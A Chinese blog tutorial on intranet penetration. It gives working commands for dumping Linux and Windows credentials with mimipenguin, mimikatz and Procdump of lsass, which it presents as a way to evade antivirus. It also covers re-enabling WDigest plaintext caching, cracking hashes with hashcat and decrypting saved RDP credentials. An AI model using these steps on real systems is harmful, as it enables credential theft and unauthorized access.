内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp

最新推荐文章于 2024-05-08 20:08:34 发布
最新推荐文章于 2024-05-08 20:08:34 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: windows linux ssh 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130645208
版权

0x00 说明

微软为了防止明文密码泄露发布了补丁KB2871997,关闭了Wdigest功能。
当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
windows读取密码出现的情况
强开注册表,可以读取明文密码
直接破解密文

Linux-mimipenguin适用环境:
unbuntu12.04-16.04
Kali 4.3.0
VSFTPd 3.0.3-8+b1
Apache2 2.4.25-3
openssh-server 1:7.3p1-1

0x01Linux-密码获取&密文破解&ssh

1.mimipenguin密码读取:

chmod 755 ./mimipenguin.sh
./mimipenguin.sh

2.密码破解:

cat /etc/shadow
hashcat.exe -a 3 -m 1800 linuxhash.txt pass.txt

加密形式:

linux sha512crypt $6$, SHA512 (Unix)加密方式:
hashcat -m 1800 sha512linux.txt p.txt
linux sha256crypt $5$, SHA256 (Unix)加密方式:
hashcat -m 7400 sha256linux.txt p.txt
linux下md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)加密方式:
hashcat -m 500 linuxmd5.txt p.txt
inux下bcrypt $2*$, Blowfish加密方式:
hashcat -m 3200 linuxmd5.txt p.txt

3、密码存储:SSH密匙
获取id_rsa文件

ssh -i id_rsa root@172.16.250.30

0x02Windows在线离线读取&密文破解&存储凭证rdp

1.在线读

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

低版本可以看到是能读取到明文密码
在这里插入图片描述
高版本,可以看到是没有读取到密码的
在这里插入图片描述

2.离线读
-1.针对防护拦截(Mimikatz被拦截)
Procdump是微软官方的工具,杀软不会拦截,再用本地mimiakatz还原

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.DMP"
sekurlsa::logonPasswords full

-2.针对高版本但有存储(内存还有数据的,登录过并且内存中是有明文账号密码的,和域控通讯过,打开防火墙输入账号密码)

Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.DMP"
sekurlsa::logonPasswords full

在这里插入图片描述

3.解决高版本
修改注册表,需要重新登录输入用户名和密码才能获取明文密码
修改注册表+强制锁屏+等待系统管理员重新登录+截取明文密码
修改注册表来让Wdigest Auth保存明文口令方式

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

4、HASH破解
在线网站解密
-m 密文类型
-a 破解类型
?l 小写
?s 符号
?d 数字
518b98ad4178a53695dc997aa02d455c
字典破解:

hashcat.exe -a 0 -m 1000 hash.txt pass.txt

在这里插入图片描述

暴力破解:

hashcat.exe -a 3 -m 1000 518b98ad4178a53695dc997aa02d455c ?l?l?l?l?l?s?s?s?d?d

5.RDP凭据抓取
在这里插入图片描述
勾选记住这个凭据才可以进行破解

查看连接记录:

cmdkey /list

在这里插入图片描述
查找本地的Credentials:

dir /a %userprofile%\appdata\local\microsoft\credentials\*

在这里插入图片描述Credentials记录guidMasterKey值

mimikatz dpapi::cred /in:C:\Users\webadmin\appdata\local\microsoft\credentials\5FBB2585F99BA05366F08E52F1C1740B

在这里插入图片描述
找到guidMasterKey对应的MasterKey:

mimikatz sekurlsa::dpapi

在这里插入图片描述
解密指定的MasterKey凭据:

mimikatz dpapi::cred /in:C:\Users\webadmin\appdata\local\microsoft\credentials\5FBB2585F99BA05366F08E52F1C1740B
/masterkey:628996c19d2f13082930aef01e4f0d2d4643a59e46c37346782fdebfb470a3a509e7005bc2f19b4ed40e9fbf8083868183200e44eac7ecfd6e90ff5d3e12671c

在这里插入图片描述

mushangqiujin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用hashcat破解Windows账户密码
天天看天天的博客
10-26 7743
使用hashcat破解Windows账户密码 (使用提供的资源直接完成实验,包括破解工具) hashcat简介 Hashcat是自称世界上最快的密码恢复工具。它在2015年之前拥有专有代码库,但现在作为免费软件发布。适用于Linux,OS X和Windows的版本可以使用基于CPU或基于GPU的变体。支持hashcat的散列算法有Microsoft LM哈希,MD4,MD5,SHA系列,Unix加...
Windows抓取密码的四种方式&&其他各类密码抓取
huohaowen的博客
03-22 2136
对于Windows(不是域环境)我们有四种方法去抓取它的密码在这次的blog,我们还是用的mimkatz。
怎么保存远程桌面用户名和密码实现双击自动连接到远程计算机
墨者侠客
06-04 1万+
如果你经常使用远程桌面连接,而且是多台远程计算机的话,你可以通过续台保存远程计算机的用户名的密码,实现双击远程桌面文件即可连接到远程计算机,方法是: 点击【开始】-【运行】中输入“mstsc.exe”打开远程桌面连接文件,点击右下角的【选项】打开详细设置,填写上计算机地址和用户名,然后勾选“允许我保存凭据”再点击“连接”,接着会弹出一个填写密码的窗口,把密码填好后连接一次;关闭远程桌面再次打开远程
绕过加密狗提取Linux/ubuntu系统文件hashcat暴力破解登录密码
yiyamala的专栏
05-08 235
偶然得到一台机器人的工控机 ubuntu14 的系统 在强烈的好奇心驱使下想看看系统里有啥东西,可是不但有登录密码,还有硬盘加密狗。注意:1、鼠标右键的复制权限不够,必须在终端下,2、复制到系统内的文件夹里是打不开的,只有复制到u盘才能打开。1、按文章1 的思路,在工控机上加挂了一块新硬盘, 然后装了个ubuntu20.4系统 与原来的系统共存。2、按文章3的思路, 将etc/shadow 文件复制出来到u盘。3、继续按文章3的操作 就可以啦。主要参考了如下三篇文章。
远程桌面保存密码(凭据)的备份导出
weixin_30920597的博客
11-12 1913
远程桌面保存密码(凭据)的备份导出 这年头Windows Server的各种维护都需要用到远程桌面,而在新的远程桌面协议中,远程桌面开始使用凭据进行登录 就像这样: 支持凭据登录最大的特色吧,就是可以记住凭据,记住之后再连接这台机器的时候就不需要输入密码的。记住密码是相当方便的,但如果长时间都使用记住密码,而没有自己去输入密码,就可能...
利用mimikatz破解远程终端凭据,获取服务器密码
weixin_33919950的博客
06-04 1158
测试环境:windows 10 道友们应该碰到过管理在本地保存远程终端的凭据,凭据里躺着诱人的胴体(服务器密码),早已让我们的XX饥渴难耐了。但是,胴体却裹了一身道袍(加密),待老衲操起法器将其宽衣解带。 0x01凭据管理器中查看Windows凭据: TERMSRV/1xx.xxx.xxx.xx2 可通过命令行获取,执行:cmdkey /list 注意:该命令务必...
学习使用口令破解工具:hashcat、LC、SamInside
热门推荐
AC1145的博客
10-27 1万+
在学习使用口令破解工具之前,我们要先创建一个用户账号,原理是利用其哈希值进行破解。 很关键的一点是,要在虚拟机里面创建用户!!! 很关键的一点是,要在虚拟机里面创建用户!!! 很关键的一点是,要在虚拟机里面创建用户!!! 重要的事情一定要说三遍。在宿主机(我是win10系统)创建用户获取的hash值是假的,根本无法用于破解。我个人猜测,是由于宿主机存在某种保护机制,使得不让获取到真正的hash。因...
RDP 分发linux&Windows操作系统
12-25
RDF 3.0 分发 LINUX WINDOWS图解 15 PAGES PDF
Xshell&Xftp;
02-13
1. **多协议支持**:除了SSH,Xshell还支持 Telnet、RDP、Serial等,满足不同环境下的远程访问需求。 2. **多窗口管理**:可以同时打开多个终端窗口,每个窗口对应一个不同的远程服务器,便于多任务并行处理。 3. **...
红队内网攻防渗透:内网渗透内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
最新发布
06-22
内网攻防渗透是网络安全领域中的重要环节,尤其在企业网络环境中,红队与蓝队之间的较量至关重要。本文将深入探讨“红队内网攻防渗透”,重点介绍内网对抗中的横向移动策略、不同入口差异、上线切换技巧,以及利用...
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web...
强大的内网渗透辅助工具集-让Yasso像风一样 支持rdpssh,redis,postgres,mongodb,m.zip
03-07
"强大的内网渗透辅助工具集-让Yasso像风一样 支持rdpssh,redis,postgres,mongodb,m.zip" 提供了一个全面的工具集合,帮助安全专家在测试环境中高效地进行渗透测试。下面我们将详细探讨这些关键组件: 1. **...
暴力破解WindowsLinux登录密码
Smk_student的博客
12-24 3344
暴力破解Windowslinux登陆密码
mstsc 不锁定远程_从远程桌面客户端提取明文凭证的工具RdpThief
weixin_39986466的博客
12-24 701
介绍远程桌面(RDP)是用于管理Windows Server的最广泛使用的工具之一,除了被管理员使用外,也容易成为攻击者的利用目标。登录到RDP会话的凭据通常用于是具有管理权限的,这也使得它们成为红队行动的一个理想目标。站在传统的角度看,许多人倾向于使用LSASS进行凭据盗窃,但是lsass.exe通常受到EDR和防病毒产品的监视,而且对LSASS的操作通常需要权限访问,于是我们自然就...
SSH连接Windows「用户名与密码的坑」及解决方案
昊大侠的博客
07-27 8166
【代码】SSH连接Windows「用户名与密码的坑」及解决方案。
内网安全】Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取
今天是几号的博客
04-08 1578
微软为了防止明文密码泄露发布了补丁KB2871997,关闭了Wdigest功能。当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。2008 R2版本可以抓取明文密码2012 R2 Datacenter 版本抓不到密钥mimikatz被拦截(杀毒等):进行离线读取操作系统过高 => 2012:离线读取、修改注册表、对hash值进行破解利用RDP凭据mimipenguin 读取
mstsc 保存用户名和密码,实现自动登录远程桌面
春眠不觉晓
08-19 560
首先手动连接远程桌面,登陆时记得保存连接,得到.rdp文件。在.rdp文件中结尾处添加用户名以及密码信息:username:s:yournamepassword 51:b:yourpasswd批处理命令:start "RemoteConsole %destIP%" mstsc %destIP%.rdp /v:%destIP%密码生成工具https://www.remkoweijnen.nl/bl...
Windows远程桌面(RDP)密码凭证获取 (゚益゚メ) 渗透测试
寻觅的博客
03-07 5561
文章目录RDP连接记录MySQL数据库密码破解WiFi密码获取浏览器相关记录其他可造成安全隐患软件NacicatXmangagerTeamview RDP连接记录 MySQL数据库密码破解 WiFi密码获取 浏览器相关记录 其他可造成安全隐患软件 Nacicat Xmangager Teamview ...
Hashcat破解/etc/shadow
m0_43406494的博客
05-13 3983
/etc/shadow、/etc/passwd文件 Linux系统中,所有用户(包括系统管理员)的账号和密码都可以在/etc/passwd和/etc/shadow这两个文件中找到,其中passwd保存的是账号,shadow保存的是账号的密码等信息 /etc/passwd文件中的每个用户都有一个对应的记录行,记录着这个用户的一下基本属性。/etc/passwd只有系统管理员才可以修改的,该文件对所有用户可读。 /etc/shadow文件只有系统管理员才能够进行修改和查看。 查看/etc/passwd文件内
内网渗透流程与思路和工具讲解
04-10
内网渗透流程与思路和工具讲解是一门深入研究的信息安全技术,它关注的是如何通过合法或非法手段评估内部网络的安全状况,以发现潜在漏洞。以下是关于内网渗透的核心知识点: 1. **内网渗透流程**: - **阶段一:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值